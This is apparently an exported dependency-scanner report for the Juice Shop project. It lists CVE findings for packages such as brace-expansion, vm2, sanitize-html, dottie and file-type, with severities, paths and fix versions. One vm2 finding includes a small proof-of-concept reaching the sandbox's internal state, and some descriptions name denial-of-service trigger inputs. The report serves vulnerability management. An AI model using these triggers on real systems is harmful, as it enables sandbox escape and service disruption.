+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 79: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/rimraf/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 80: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 81: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/ts-node-dev/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 82: CVE-2026-33750 Brace-Expansion 2.0.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion2.0.2
+ + + + + + + +
File Path
juice-shop/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 240: GHSA-2cm2-m3w5-gp2f Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

+ + +
Description
+

vm2 has access to VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.2

+

Summary

+

https://github.com/patriksimek/vm2/security/advisories/GHSA-wp5r-2gw5-m7q7 is not fully patched.

+

Details

+

It is still possible to get access to VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL.

+

PoC

+
const {VM} = require("vm2");
+const vm = new VM();
+console.log(vm.run(`
+ globalThis['VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL']
+`));
+
+ + +
Mitigation
+

3.11.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.2
+https://github.com/patriksimek/vm2/security/advisories/GHSA-2cm2-m3w5-gp2f

+ + + + + + + +
+
+
+
+ Finding 30: CVE-2025-15281 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 908 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

glibc: wordexp with WRDE_REUSE and WRDE_APPEND may return uninitialized memory
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

Calling wordexp with WRDE_REUSE in conjunction with WRDE_APPEND in +the GNU C Library version 2.0 to version 2.42 may cause the interface to + return uninitialized memory in the we_wordv member, which on subsequent + calls to wordfree may abort the process.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

http://www.openwall.com/lists/oss-security/2026/01/20/3
+https://access.redhat.com/errata/RHSA-2026:2786
+https://access.redhat.com/security/cve/CVE-2025-15281
+https://bugzilla.redhat.com/2429771
+https://bugzilla.redhat.com/2430201
+https://bugzilla.redhat.com/2431196
+https://bugzilla.redhat.com/show_bug.cgi?id=2429771
+https://bugzilla.redhat.com/show_bug.cgi?id=2430201
+https://bugzilla.redhat.com/show_bug.cgi?id=2431196
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15281
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0861
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0915
+https://errata.almalinux.org/9/ALSA-2026-2786.html
+https://errata.rockylinux.org/RLSA-2026:2786
+https://linux.oracle.com/cve/CVE-2025-15281.html
+https://linux.oracle.com/errata/ELSA-2026-50174.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-15281
+https://sourceware.org/bugzilla/show_bug.cgi?id=33814
+https://ubuntu.com/security/notices/USN-8005-1
+https://www.cve.org/CVERecord?id=CVE-2025-15281
+https://www.openwall.com/lists/oss-security/2026/01/20/3

+ + + + + + + +
+
+
+
+ Finding 87: CVE-2026-27837 Dottie 2.0.6 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1321 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
dottie2.0.6
+ + + + + + + +
File Path
juice-shop/node_modules/dottie/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

+ + +
Description
+

dottie.js: dottie.js: Unauthorized object modification via prototype pollution bypass
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.0.7

+

Dottie provides nested object access and manipulation in JavaScript. +Versions 2.0.4 through 2.0.6 contain an incomplete fix for +CVE-2023-26132. The prototype pollution guard introduced in commit 7d3aee1 only validates the first segment of a dot-separated path, allowing an attacker to bypass the protection by placing __proto__ at any position other than the first. Both dottie.set() and dottie.transform() are affected. Version 2.0.7 contains an updated fix to address the residual vulnerability.

+ + +
Mitigation
+

2.0.7

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27837
+https://github.com/advisories/GHSA-4gxf-g5gf-22h4
+https://github.com/mickhansen/dottie.js
+https://github.com/mickhansen/dottie.js/commit/7e8fa1345a4b46325f0eab8d7aeb1c4deaefdb14
+https://github.com/mickhansen/dottie.js/security/advisories/GHSA-r5mx-6wc6-7h9w
+https://nvd.nist.gov/vuln/detail/CVE-2026-27837
+https://www.cve.org/CVERecord?id=CVE-2026-27837

+ + + + + + + +
+
+
+
+ Finding 88: CVE-2022-41940 engine.io 4.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 248 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
engine.io4.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/engine.io/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

engine.io: Specially crafted HTTP request can trigger an uncaught exception
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.6.1, 6.2.1

+

Engine.IO is the implementation of transport-based +cross-browser/cross-device bi-directional communication layer for +Socket.IO. A specially crafted HTTP request can trigger an uncaught +exception on the Engine.IO server, thus killing the Node.js process. +This impacts all the users of the engine.io package, including those who + uses depending packages like socket.io. There is no known workaround +except upgrading to a safe version. There are patches for this issue +released in versions 3.6.1 and 6.2.1.

+ + +
Mitigation
+

3.6.1, 6.2.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-41940
+https://github.com/socketio/engine.io
+https://github.com/socketio/engine.io/commit/425e833ab13373edf1dd5a0706f07100db14e3c6
+https://github.com/socketio/engine.io/commit/83c4071af871fc188298d7d591e95670bf9f9085
+https://github.com/socketio/engine.io/security/advisories/GHSA-r7qp-cfhv-p84w
+https://nvd.nist.gov/vuln/detail/CVE-2022-41940
+https://www.cve.org/CVERecord?id=CVE-2022-41940

+ + + + + + + +
+
+
+
+ Finding 187: CVE-2016-1000237 Sanitize-HTML 1.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
sanitize-html1.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

+ + +
Description
+

XSS - Sanitization not applied recursively
+Target: Node.js
+Type: node-pkg
+Fixed version: >=1.4.3

+

sanitize-html before 1.4.3 has XSS.

+ + +
Mitigation
+
+

=1.4.3

+
+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/apostrophecms/sanitize-html/commit/762fbc7bba389f3f789cc291c1eb2b64f60f2caf
+https://github.com/apostrophecms/sanitize-html/issues/29
+https://github.com/punkave/sanitize-html/issues/29
+https://nodesecurity.io/advisories/135
+https://nvd.nist.gov/vuln/detail/CVE-2016-1000237
+https://raw.githubusercontent.com/distributedweaknessfiling/cvelist/master/2016/1000xxx/CVE-2016-1000237.json
+https://www.npmjs.com/advisories/135

+ + + + + + + +
+
+
+
+ Finding 90: CVE-2026-31808 File-Type 16.5.4 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 835 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
file-type16.5.4
+ + + + + + + +
File Path
juice-shop/node_modules/file-type/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

+ + +
Description
+

file-type: file-type: Denial of Service due to infinite loop in ASF file parsing
+Target: Node.js
+Type: node-pkg
+Fixed version: 21.3.1

+

file-type detects the file type of a file, stream, or data. Prior to +21.3.1, a denial of service vulnerability exists in the ASF (WMV/WMA) +file type detection parser. When parsing a crafted input where an ASF +sub-header has a size field of zero, the parser enters an infinite loop. + The payload value becomes negative (-24), causing +tokenizer.ignore(payload) to move the read position backwards, so the +same sub-header is read repeatedly forever. Any application that uses +file-type to detect the type of untrusted/attacker-controlled input is +affected. An attacker can stall the Node.js event loop with a 55-byte +payload. Fixed in version 21.3.1.

+ + +
Mitigation
+

21.3.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-31808
+https://github.com/sindresorhus/file-type
+https://github.com/sindresorhus/file-type/commit/319abf871b50ba2fa221b4a7050059f1ae096f4f
+https://github.com/sindresorhus/file-type/security/advisories/GHSA-5v7r-6r5c-r473
+https://nvd.nist.gov/vuln/detail/CVE-2026-31808
+https://www.cve.org/CVERecord?id=CVE-2026-31808

+ + + + + + + +
+
+
+
+ Finding 188: CVE-2017-16016 Sanitize-HTML 1.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
sanitize-html1.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

+ + +
Description
+

Cross-Site Scripting in sanitize-html
+Target: Node.js
+Type: node-pkg
+Fixed version: 1.11.4

+

Sanitize-html is a library for scrubbing html input of malicious +values. Versions 1.11.1 and below are vulnerable to cross site scripting + (XSS) in certain scenarios: If allowed at least one nonTextTags, the +result is a potential XSS vulnerability.

+ + +
Mitigation
+

1.11.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/advisories/GHSA-xc6g-ggrc-qq4r
+https://github.com/punkave/sanitize-html/commit/5d205a1005ba0df80e21d8c64a15bb3accdb2403
+https://github.com/punkave/sanitize-html/commit/5d205a1005ba0df80e21d8c64a15bb3accdb2403)))
+https://github.com/punkave/sanitize-html/issues/100
+https://nodesecurity.io/advisories/154
+https://npmjs.com/package/sanitize-html#discarding-the-entire-contents-of-a-disallowed-tag
+https://nvd.nist.gov/vuln/detail/CVE-2017-16016
+https://www.npmjs.com/advisories/154

+ + + + + + + +
+
+
+
+ Finding 92: CVE-2022-33987 Got 8.3.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
got8.3.2
+ + + + + + + +
File Path
juice-shop/node_modules/got/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

+ + +
Description
+

nodejs-got: missing verification of requested URLs allows redirects to UNIX sockets
+Target: Node.js
+Type: node-pkg
+Fixed version: 12.1.0, 11.8.5

+

The got package before 12.1.0 (also fixed in 11.8.5) for Node.js allows a redirect to a UNIX socket.

+ + +
Mitigation
+

12.1.0, 11.8.5

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2022:6595
+https://access.redhat.com/security/cve/CVE-2022-33987
+https://bugzilla.redhat.com/1907444
+https://bugzilla.redhat.com/1945459
+https://bugzilla.redhat.com/1964461
+https://bugzilla.redhat.com/2007557
+https://bugzilla.redhat.com/2098556
+https://bugzilla.redhat.com/2102001
+https://bugzilla.redhat.com/2105422
+https://bugzilla.redhat.com/2105426
+https://bugzilla.redhat.com/2105428
+https://bugzilla.redhat.com/2105430
+https://bugzilla.redhat.com/show_bug.cgi?id=1907444
+https://bugzilla.redhat.com/show_bug.cgi?id=1945459
+https://bugzilla.redhat.com/show_bug.cgi?id=1964461
+https://bugzilla.redhat.com/show_bug.cgi?id=2007557
+https://bugzilla.redhat.com/show_bug.cgi?id=2098556
+https://bugzilla.redhat.com/show_bug.cgi?id=2102001
+https://bugzilla.redhat.com/show_bug.cgi?id=2105422
+https://bugzilla.redhat.com/show_bug.cgi?id=2105426
+https://bugzilla.redhat.com/show_bug.cgi?id=2105428
+https://bugzilla.redhat.com/show_bug.cgi?id=2105430
+https://bugzilla.redhat.com/show_bug.cgi?id=2121019
+https://bugzilla.redhat.com/show_bug.cgi?id=2124299
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28469
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7788
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33502
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3807
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29244
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32212
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32213
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32214
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32215
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33987
+https://errata.almalinux.org/9/ALSA-2022-6595.html
+https://errata.rockylinux.org/RLSA-2022:6595
+https://github.com/sindresorhus/got
+https://github.com/sindresorhus/got/commit/861ccd9ac2237df762a9e2beed7edd88c60782dc
+https://github.com/sindresorhus/got/compare/v12.0.3...v12.1.0
+https://github.com/sindresorhus/got/pull/2047
+https://github.com/sindresorhus/got/releases/tag/v11.8.5
+https://github.com/sindresorhus/got/releases/tag/v12.1.0
+https://linux.oracle.com/cve/CVE-2022-33987.html
+https://linux.oracle.com/errata/ELSA-2022-6595.html
+https://nvd.nist.gov/vuln/detail/CVE-2022-33987
+https://www.cve.org/CVERecord?id=CVE-2022-33987

+ + + + + + + +
+
+
+
+ Finding 189: CVE-2019-25225 Sanitize-HTML 1.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
sanitize-html1.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

+ + +
Description
+

sanitize-html: sanitize-html cross site scripting
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.0.0-beta

+

sanitize-html prior to version 2.0.0-beta is vulnerable to Cross-site Scripting (XSS). The sanitizeHtml() function in index.js does not sanitize content when using the custom transformTags + option, which is intended to convert attribute values into text. As a +result, malicious input can be transformed into executable code.

+ + +
Mitigation
+

2.0.0-beta

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2019-25225
+https://github.com/Checkmarx/Vulnerabilities-Proofs-of-Concept/tree/main/2019/CVE-2019-25225
+https://github.com/apostrophecms/sanitize-html
+https://github.com/apostrophecms/sanitize-html/commit/712cb6895825c8bb6ede71a16b42bade42abcaf3
+https://github.com/apostrophecms/sanitize-html/issues/293
+https://github.com/apostrophecms/sanitize-html/pull/156
+https://nvd.nist.gov/vuln/detail/CVE-2019-25225
+https://www.cve.org/CVERecord?id=CVE-2019-25225

+ + + + + + + +
+
+
+
+ Finding 190: CVE-2021-26539 Sanitize-HTML 1.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
sanitize-html1.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

+ + +
Description
+

sanitize-html: improper handling of internationalized domain name (IDN) can lead to bypass hostname whitelist validation
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.3.1

+

Apostrophe Technologies sanitize-html before 2.3.1 does not properly +handle internationalized domain name (IDN) which could allow an attacker + to bypass hostname whitelist validation set by the +"allowedIframeHostnames" option.

+ + +
Mitigation
+

2.3.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

